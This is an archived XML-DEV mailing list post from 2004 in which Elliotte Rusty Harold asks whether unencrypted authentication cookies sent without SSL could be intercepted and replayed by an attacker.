[XML-DEV Mailing List Archive Home] [By Thread] [By Date] [Recent Entries] [Reply To This Message] Re: Re: Cookies at XML Europe 2004 -- Call forParticipation
At 4:15 PM -0500 1/7/04, Rich Salz wrote: >No. I'm saying without rest I send it once, store it at the server, >use a cookie to refer to it in future transactions. Is the cookie sent unencrypted? If so, and we're not using SSL (as is the case in many cookie scenarios) what, if anything, prevents an attacker from snarfing the authentication cookie as it makes its way back from the client to the server (or in the other direction) and adding that to its own requests to the same server? I hope there's something that prevents this. There must be. Otherwise this is a huge, gaping security hole much bigger than anything we've been arguing about, and I would think it would have lots of practical exploits on the Web today. Please tell me there's some reason this attack won't work. -- Elliotte Rusty Harold elharo@m... Effective XML (Addison-Wesley, 2003) http://www.cafeconleche.org/books/effectivexml http://www.amazon.com/exec/obidos/ISBN%3D0321150406/ref%3Dnosim/cafeaulaitA
|
PURCHASE STYLUS STUDIO ONLINE TODAY!Purchasing Stylus Studio from our online shop is Easy, Secure and Value Priced! Download The World's Best XML IDE!Accelerate XML development with our award-winning XML IDE - Download a free trial today! Subscribe in XML format
|